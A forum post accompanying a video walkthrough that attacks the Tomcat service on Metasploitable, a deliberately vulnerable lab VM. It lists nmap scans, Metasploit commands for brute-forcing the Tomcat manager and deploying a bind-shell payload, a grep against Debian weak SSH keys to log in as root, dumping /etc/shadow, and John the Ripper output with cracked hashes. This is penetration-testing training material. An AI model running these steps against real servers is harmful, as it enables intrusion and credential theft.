Results 1 to 1 of 1

Thread: [Video] Metasploitable - TomCat

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] Metasploitable - TomCat

    Watch video on-line:
    Download video:
    Download usernames.lst:
    Download passwords.lst:
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2

    What is this?
    This video demonstrates an attack on the TomCat service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." -

    "Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." -

    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > Use Metasploit to send a payload (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)

    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > SSH--- on Backtrack 4 (Final) > John The Ripper --- on BackTrack!
    > Dictionaries/Word-lists --- Usernames Passwords
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar ~Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar ~ Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar ~ Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar ~ Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
    nmap -sV -sS -O -f -n
    search tomcat
    use scanner/http/tomcat_mgr_login
    show options
    setg RHOSTS
    setg RPORT 8180
    set USER_FILE /root/usernames.lst
    set PASS_FILE /root/passwords.lst
    use multi/http/tomcat_mgr_deploy
    show options
    setg USERNAME tomcat
    setg PASSWORD tomcat
    show payloads
    set payload generic/shell_bind_tcp
    show options
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    firefox -> -> Debian OpenSSL Predictable (5720) ->
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@
    cat /etc/shadow
    kate -> Paste -> Save (Filename: /root/shadow)
    ./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
    ssh msfadmin@
    ------------------------------------------------------------------------------------root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
    sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
    klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
    msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
    postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
    user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
    service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::


    Song: Underworld - Cowgirl
    Video length: 7:07
    Capture length: 11:17

    Blog Post:
    Forum Post:
    Last edited by g0tmi1k; 03-05-2011 at 02:05 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Metasploitable - MySQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 4
    Last Post: 03-06-2011, 10:57 AM
  2. Owning Metasploitable with Backtrack
    By sickness in forum BackTrack Videos
    Replies: 17
    Last Post: 11-02-2010, 02:12 PM
  3. [Video] Metasploitable - TikiWiki
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:38 PM
  4. [Video] Metasploitable - PostgreSQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:22 PM
  5. Metasploitable
    By thorin in forum Beginners Forum
    Replies: 1
    Last Post: 05-25-2010, 07:07 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts